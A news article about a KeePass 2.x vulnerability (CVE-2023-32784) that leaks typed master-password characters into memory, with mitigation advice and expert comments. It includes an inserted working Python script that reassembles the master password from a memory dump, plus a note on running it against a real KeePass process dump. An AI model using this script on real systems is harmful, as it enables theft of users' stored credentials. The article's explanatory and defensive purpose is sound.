
New KeePass Password Manager Exploit Can Draw a Plaintext Master Password From a Memory Dump

Another vulnerability that can expose KeePass master passwords has surfaced, following one disclosed at the start of the year. The new flaw leaves traces of the master password in system memory as it is typed; if that memory is dumped, the password can be reassembled from the traces.

KeePass has said that it plans to patch the issue with the next release of the software, but that it was not an immediate threat to most users as it would require an unusual level of access to a victim’s PC.

KeePass security exploit digs user passwords out of system memory

The flaw (CVE-2023-32784) is present in all current 2.x versions of the popular open source password manager. It does not affect the older 1.x branch, and it only applies when the master password has been typed into the unlock dialog; a password pasted in does not leave the telltale fragments. It was disclosed by security researcher “vdohney” on the project’s SourceForge discussion forum in early May, and Dominik Reichl (founder and maintainer of KeePass) quickly responded with mitigation measures.

However, Reichl also said that the fix would not reach the general public until the next official release of KeePass (2.54), which has no firm release date and could be as far out as July. The flaw cannot be exploited on its own: an attacker first needs a memory dump, which malware running with sufficient privileges could take remotely (though at that level of access there are more direct ways to compromise KeePass, such as logging keystrokes). Otherwise it requires physical access to the computer or to its storage devices, where the page file and hibernation file live.

The attacker only needs a memory dump from any source: a dump of the KeePass process, the page file or hibernation file, or an image of physical RAM. The flaw is in the custom text box KeePass uses for the master password. Each keystroke leaves a managed .NET string in memory consisting of the masking dots for the characters already entered, followed by the newly typed character in plaintext. Sorting those leftover strings by length therefore reassembles the password in order; only the first character, which is typed before any dots exist, is not recoverable this way. Reichl’s immediate mitigation reduces the creation of these strings and adds decoy strings of the same length filled with random characters, so that the genuine fragments can no longer be told apart from the chaff. He also indicated that further security improvements would ship with the 2.54 release.
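As an added illustration of the reassembly described above (editor-written example code, not KeePass code and not vdohney’s PoC), the following Python script scans a raw dump for UTF-16LE strings of the form mask-run plus one character, groups the characters by how many mask characters precede them, and renders the candidate password. It assumes the mask glyph is U+25CF (the character the public PoC searched for) and uses a constructed byte string as a stand-in for a real dump; the `simulate_dump` helper can also add random decoy strings, which shows how the chaff mitigation turns a unique answer into an ambiguous one.

```python
"""Reassemble a typed KeePass 2.x master password from leftover text-box strings.

Added example, not KeePass code and not the published PoC. It models the
CVE-2023-32784 leak: each keystroke in the password box leaves a managed .NET
string, stored as UTF-16LE, of the form <mask * N><typed char>, where N is the
number of characters already entered. Assumption: the mask glyph is U+25CF,
the character the public PoC scanned for.
"""
import random
import re
import string
from collections import defaultdict

MASK = "\u25cf"  # assumed masking glyph of the KeePass password text box


def fragment_pattern(mask=MASK, max_prefix=64):
    """Regex over raw bytes: a run of 1..max_prefix UTF-16LE mask code units
    followed by exactly one printable-ASCII code unit (the leaked character)."""
    m = re.escape(mask.encode("utf-16-le"))
    return re.compile(b"(?:" + m + b"){1,%d}" % max_prefix + rb"(?P<ch>[\x20-\x7e]\x00)")


def find_fragments(dump: bytes, mask=MASK) -> dict:
    """Map 0-based password index -> set of candidate characters seen there.
    The index equals the number of mask code units preceding the character."""
    unit = len(mask.encode("utf-16-le"))
    found = defaultdict(set)
    for m in fragment_pattern(mask).finditer(dump):
        index = (m.start("ch") - m.start()) // unit
        found[index].add(m.group("ch").decode("utf-16-le"))
    return dict(found)


def reassemble(fragments: dict) -> str:
    """Render the recovered password. Index 0 is shown as '?' because the first
    keystroke leaves no masked prefix and is never recoverable this way; an
    index with several candidates (as after decoy strings) is shown as {a|b}."""
    if not fragments:
        return ""
    chars = ["?"]
    for i in range(1, max(fragments) + 1):
        cands = sorted(fragments.get(i, ()))
        if len(cands) == 1:
            chars.append(cands[0])
        elif cands:
            chars.append("{" + "|".join(cands) + "}")
        else:
            chars.append("?")
    return "".join(chars)


def simulate_dump(password: str, decoys: int = 0, seed: int = 1, mask=MASK) -> bytes:
    """Constructed stand-in for a process memory dump (not real KeePass memory):
    the leftover string for every keystroke after the first, scattered among
    null padding. decoys > 0 adds same-length strings ending in a random
    character for each real fragment, imitating the chaff in the mitigation."""
    rng = random.Random(seed)
    alphabet = string.ascii_letters + string.digits
    chunks = []
    for i in range(1, len(password)):
        chunks.append((mask * i + password[i]).encode("utf-16-le"))
        for _ in range(decoys):
            chunks.append((mask * i + rng.choice(alphabet)).encode("utf-16-le"))
    rng.shuffle(chunks)
    pad = b"\x00" * 16
    return pad + pad.join(chunks) + pad


if __name__ == "__main__":
    pw = "Tr0ub4dor&3"  # constructed sample password
    print(reassemble(find_fragments(simulate_dump(pw))))            # ?r0ub4dor&3
    print(reassemble(find_fragments(simulate_dump(pw, decoys=3))))  # several {a|b|c} slots
```

Against a real dump you would pass the file bytes to `find_fragments` instead of the simulated ones (for example the .DMP that Task Manager’s “Create dump file” writes for the KeePass process). Expect some false positives from unrelated data that happens to match the pattern, which is why each index keeps a set of candidates rather than a single character.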

Password manager users may be unaware of illicit pathways to master passwords

While this is a concerning exploit, memory-scraping tools that pull the master password out of a running KeePass process, such as KeeFarce, have existed for nearly a decade. Nor is the problem unique to KeePass: password managers in general are exposed to tools that attack system memory, particularly while the user is logged in or once the operating system is fully compromised. What sets this vulnerability apart is persistence: the leftover strings can be recovered long after the user has locked or closed KeePass, from the page file or hibernation file, and straight from RAM if a dump is taken quickly enough.

As Casey Ellis, Founder and CTO at Bugcrowd, notes: “The vulnerability is fairly esoteric, and given the “keys to the kingdom” nature of password vaults, they are rightfully held to a much higher standard when it comes to code hygiene and security testing and auditing. The exploit itself isn’t trivial, but the PoC released by vdohney makes exploitation relatively simple and straightforward. I would be very surprised if we didn’t see attackers looking for KeePass on compromised machines and taking advantage of this window of exploitation before the KeePass user-base has patched their systems.”

Master password systems usually come with the caveat that they can no longer be considered secure once an attacker has full remote control of the machine or even unprivileged physical access to it. The earlier KeePass issue this year, which surfaced in early February, illustrated the same point: an attacker able to write to the KeePass.config.xml file could add an export trigger that silently wrote the database contents out in cleartext.

While KeePass users wait for the update, they can take some steps to reduce the risk if they are concerned about someone gaining access to their system. The swap file (pagefile.sys) and hibernation file (hiberfil.sys) are two of the main places a memory dump can be taken from; disabling hibernation removes the latter, and Windows can be configured to wipe the page file at shutdown. Because only typed characters leak, a master password pasted into the dialog in one operation does not leave the fragments, so a supported hardware key that supplies the password that way keeps the vulnerable strings out of memory (a device that emulates a keyboard still delivers one keystroke at a time and does not avoid the leak). Users might also consider the KeePassXC fork, which is not affected by this vulnerability.

The last year or so has been a rough period for password managers, with nearly all of the big names in the market rocked by some security issue or another. A drawn-out LastPass breach dealt a severe blow to consumer confidence in the company, and several major competitors had issues with either malicious ads targeting their services or a form auto-fill vulnerability capturing master passwords.

But Craig Jones, Vice President of Security Operations at Ontinue, notes that the market still has secure options and that these systems are usually a net positive for security when users are expected to juggle a hundred different logins: “Discovering vulnerabilities in password managers serves as a reminder that no system is impervious to potential risks. However, with proper security measures and responsible usage, password managers can still be a valuable tool in enhancing password security and reducing the impact of data breaches. The most worrying detail in this KeePass password dumper is its ability to bypass the master password protection. By doing so, an attacker can potentially gain access to all stored passwords and sensitive information. This highlights a critical vulnerability that could be exploited by individuals with physical access to a victim’s computer or those capable of executing malicious code on the system.”

“While the exploit raises concerns, it is important to remember that vulnerabilities can exist in any software or system, and this needs physical access. The concentrated risk and potential pitfalls of password managers lie in the fact that compromising a single master password can potentially expose multiple accounts and sensitive information. However, it’s crucial to note that this particular vulnerability does not reflect the inherent weaknesses of all password managers. By choosing reputable and well-maintained password managers, regularly updating them, and following best practices, the security benefits of password managers can still outweigh the risks,” advised Jones.